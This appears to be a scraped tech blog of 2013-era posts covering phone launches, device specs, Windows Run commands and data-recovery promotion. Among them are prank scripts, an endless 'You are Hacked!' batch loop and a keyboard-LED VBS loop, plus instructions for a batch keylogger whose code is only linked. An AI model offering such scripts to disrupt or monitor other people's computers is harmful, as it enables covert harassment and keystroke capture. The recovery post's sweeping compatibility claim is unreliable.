Next iPhone to Launch on September 10

iOS 7 with iPhone 5

 

Apple will unveil the latest iPhone model on Tuesday, September 10, according to a new report from the always reliable AllThingsD. The report confirms only the launch date, but seems to suggest that Apple may actually release two distinct iPhone models; the expected update to the iPhone 5 (iPhone 5S?), and possibly a lower-cost color iPhone model that has floated about in rumors for quite some time.

The new upper end iPhone model is expected to resemble the existing iPhone 5 in appearance, and include improvements to the camera and processor. There is also a rumored possibility that a fingerprint sensor will be included in the device as a means of added security or password entry. Additional features are possible, though rumors remain fairly sparse.

A lower cost iPhone model has long been rumored. Current speculation suggests such a device would basically have the same internal components as an iPhone 5, but have a colorful outer enclosure made of plastic, replacing the aluminum and glass casing that surrounds the existing iPhone 5 models. Rumored colors include white, and bright shades of red, yellow, green, and blue (below rendering courtesy of MacRumors).

Color iPhone rendering mockup

AllThingsD also mentions that OS X Mavericks will be released “in the coming weeks”, suggesting that the updated Mac operating system may arrive before the new iPhone and iOS 7. Of course, a new iPhone launch also suggests that iOS 7 is due just around the corner as well, so whenever the iPhone starts shipping will likely be the same date that iOS 7 is released to consumers for supported iPhone, iPad, and iPod touch models.

As usual, treat any speculated features or abilities as a rumor until Apple makes an official announcement.

 

Via: osxdaily.com

Create ‘textBox’ dynamically – Windows Phone

private void Button_Click_1(object sender, RoutedEventArgs e) //Event
{
      TextBox txt = new TextBox(); //new textbox
      txt.Margin = new Thickness(300,0,0,0); //textbox appearance
      txt.Width = 124; //textbox width
      txt.Height = 68; //textbox Height
      ContentPanel.Children.Add(txt); //Adding to ContentPanel
      button.Visibility = System.Windows.Visibility.Visible;
}

Amazing Keyboard Trick!

Dancing keyboard Led lights !!

 

 

Open noteped and paste this codes (without ” “)

“Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop”

save it as led.vbs
Done.

How to stop this. 😛

!)First open Task Manager [ctrl+alt+del ]
!!)Then Go to process tab. 3. Select wscript.exe
!!!)Click on End process.

Samsung gonna Announce Galaxy S4 Mini

 

00 GT I9190 Front black Standard Online Samsung Announces Galaxy S4 Mini

Samsung yesterday announced the compact with many of the advance features of Galaxy S4, the Galaxy S4 Mini.

Samsung is marketing S4 Mini as powerful yet compact version of company’s bestselling smartphone, Galaxy S4.

Samsung galaxy S4 mini comes with 4.3 inch qHD Super AMOLED screen and runs on Android 4.2.2 Jelly Bean on top of Samsung’s extensive TouchWiz customizations.

The Galaxy S4 mini boasts powerful performance, equipped with a 1.7GHz dual core processor. It comes along with a 8-megapixel rear-facing camera and 1.9-megapixel HD front-facing camera.

Here are the complete specs for Galaxy S4 Mini:

  • Processor: 1.7 GHz Dual-Core Processor
  • OS: Android 4.2.2 (Jelly Bean)
  • Display: 4.3”qHD (16:9 wide view) Super AMOLED
  • Dimension: 124.6 x 61.3 x 8.94mm, 107g (3G Dual SIM version:108g)
  • Memory: 8GB Internal memory (User Memory approximately 5GB) + microSD (up to 64GB), 1.5GB RAM
  • Camera:
    • Rear : 8 megapixel
    • Front: 1.9 megapixel
    • Camera Features: Sound & Shot, Night(Low Light Shot), Best Photo, Best Face, Beauty Face(include Live Beauty), HDR (High Dynamic Range), Panorama, Sports, Continuous Shot
  • Connectivity:
    • WiFi 5.0GHz a/b/g/n
    • GPS + GLONASS
    • Bluetooth® v4.0 (LE), NFC(LTE version only)
    • IR LED (Remote Control)
  • Sensor: Accelerometer, Light, Proximity, Gyro, Magnetic
  • Battery: 1,900mAh
  • Other features:
    • Group Play: Share Music, Share Picture, Share Document,
    • Play Games
    • Story Album, S Translator
    • S Travel (TripAdvisor), S Voice™,
    • S Health (Downloadable from Samsung Apps)
    • Samsung Adapt Display, Samsung Adapt Sound
    • Safety Assistance, Samsung Link, Screen Mirroring, HomeSync, Smart Switch
    • Samsung KNOX

Samsung hasn’t released any info regarding the availability or price of S4 Mini.

 

via: http://propakistani.pk/

Google announces HTC One “Nexus Edition” with stock Android 4.2.2 coming to U.S. Play Store on June 26th

Screenshot-2013-05-30-at-11_58_29-e1369929537263.png 

As rumoured, debunked and subsequently predicted, Sundar Pichai, head of Android at Google, announced that will offer the 32GB HTC One “Nexus Edition” on the U.S. Google Play Store starting June 26th.

As with the Galaxy S4, this model will be visually identical to its carrier-sold equivalent, but runs vanilla Android and will be updated directly by Google. The cost, at $599, will be slightly lower than the Samsung offering ($649), and will launch with Android 4.2.2 Jelly Bean.

The HTC One has consistently been considered one of the best Android devices ever made, but shipped with Jelly Bean 4.1.2, which is going on a year old now. Because Google will be directly updating these phones, alongside its Nexus products, there is the expectation that though users may be losing some of the functionality HTC has worked so hard to integrate, vanilla Android offers a simplified, higher-performance experience.

Like the Galaxy S4, this version of the HTC One won’t be sold on the Canadian Play Store, but it will be compatible with Rogers, Bell and TELUS. Unfortunately WIND and Mobilicity users are out of luck, as it lacks the necessary 3G radio bands.

At $599, it’s also significantly cheaper than purchasing outright most high-end devices from carriers here in Canada. HTC says it is working on expanding its distribution to other countries, so we may see it sold in Canada eventually.

Source: HTC
Image Source: Joanna Stern

via: mobilesyrup

Harmless Hacking Prank using Notepad

Here is a fun, funny, and easy way to annoy your friends and family members by (harmlessly) messing with their computers.

“A never Ending Message”

1: Open notepad (under Start > All Programs > Accesories > Notepad
Copy and paste these lines into Notepad:

@echo off
:top
msg * You are Hacked!
goto top

and save it by “abc.bat ” name or ” xyz.bat ” file
and then run the file

Create a simple Keylogger Using Notepad

I AM NOT RESPONSIBLE FOR YOUR MISTAKES. FOR EDUCATIONAL PURPOSES ONLY

The code we will be using is a simple Batch code.

Code (http://pastebin.com/09kDPyXK)

1.) Now paste that into Notepad and save it as a Logger.bat file.

2.) Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.

3.) Drag that folder in to the C:\

4.) Test out the Logger.bat!

5.) Alright, now once you test it, you will go back into the Logs folder in the C:\And a .txt file will be in there, [if you make a second entry, the .txt file will overwrite itself.

How to Recover Data from Formatted Drive

Image

Opps, I accidently performed format on my hard disk partition. I have many important documents and photos there. Help!” Did you run into the similiar situation? Wow, it must be hard to accept the data loss since drives were formatted. Well, don’t worry! with iCare Data Recovery Standard, you can perform any formatting of your drives and also get data back

alive to you.
Why can I still get data back from formatted drive?

The truth is by formatting a drive, it only erased the file address table. The data are still on the drives sound and not touched after you performed quick formatting or full formatting, ie regular&complete formatting. Here are the steps you can follow to get your photos or files back from formatted drive.

STEPS
1? Download a demo of iCare Data Recovery Standard

Download and install notice: please download and install the exe file on a partition where there is no data loss, ie if you formatted E drive and then it is a must to download and install the software onto a non-E partition, like D drive etc. You could suffer permanent data loss by overwriting the formatted drive, so never touch the formatted drive with new data. (It is safe to search files, since it won’t write a byte when searching formatted files.)

?: Start iCare Data Recovery Standard from the desktop icon once you have finished the installation or you might also be able to start it from “Start–>Programs–>iCare Data Recovery Standard

? Select “Format Recovery” which is on the very left right corner to recover lost files from formatted drive.

?Select the partition which was formatted and then click “Recover” to search. Here I formatted H partition and then rebooted the computer for unformat test. And a box showing scanning devices will turn up.

?When scanning device finished, there would be a partition which is formatted, be free to click “Show Files” which would list your lost files from your formatted hard drive.

? After clicking “show files”, there will be a list of lost files, you can check whether it is your lost files.

this software works with every card and memory in the world.

GPA doesn’t matters

GPA doesn't matters

Important RUN’s command

Start > Run > then

– Accessibility Controls
access.cpl

– Add Hardware Wizard
hdwwiz.cpl
– Add/Remove Programs
appwiz.cpl
– Administrative Tools
control admintools
– Automatic Updates
wuaucpl.cpl
– Bluetooth Transfer Wizard
fsquirt
– Calculator
calc
– Certificate Manager
certmgr.msc
– Character Map
charmap
– Check Disk Utility
chkdsk
– Clipboard Viewer
clipbrd
– Command Prompt
cmd
– Component Services
dcomcnfg
– Computer Management
compmgmt.msc
– Date and Time Properties
timedate.cpl
– DDE Shares
ddeshare
– Device Manager
devmgmt.msc
– Direct X Control Panel (If
Installed)
directx.cpl
– Direct X Troubleshooter
dxdiag
– Disk Cleanup Utility
cleanmgr
– Disk Defragment
dfrg.msc
– Disk Management
diskmgmt.msc
– Disk Partition Manager
diskpart
– Driver Verifier Utility
verifier
– Event Viewer
eventvwr.msc
– Findfast
findfast.cpl
– Folders Properties
control folders
– Fonts Folder
fonts
– Group Policy Editor (XP Prof)
gpedit.msc
– Hearts Card Game
mshearts
– Keyboard Properties
control keyboard
– Local Security Settings
secpol.msc
– Local Users and Groups
lusrmgr.msc
– Logs You Out Of Windows
logoff
– Minesweeper Game
winmine
– Mouse Properties
main.cpl
– Notepad
notepad
– On Screen Keyboard
osk
– Password Properties
password.cpl
– Performance Monitor
perfmon.msc
– Power Configuration
powercfg.cpl
– Registry Editor
regedit
– Removable Storage
ntmsmgr.msc
– Security Center
wscui.cpl
– Shuts Down Windows
shutdown
– Sounds and Audio
mmsys.cpl
– System Configuration
Editor sysedit
– System Configuration
Utility msconfig
– System Properties
sysdm.cpl
– Task Manager
taskmgr
– Windows XP Tour Wizard
tourstart
– Wordpad
write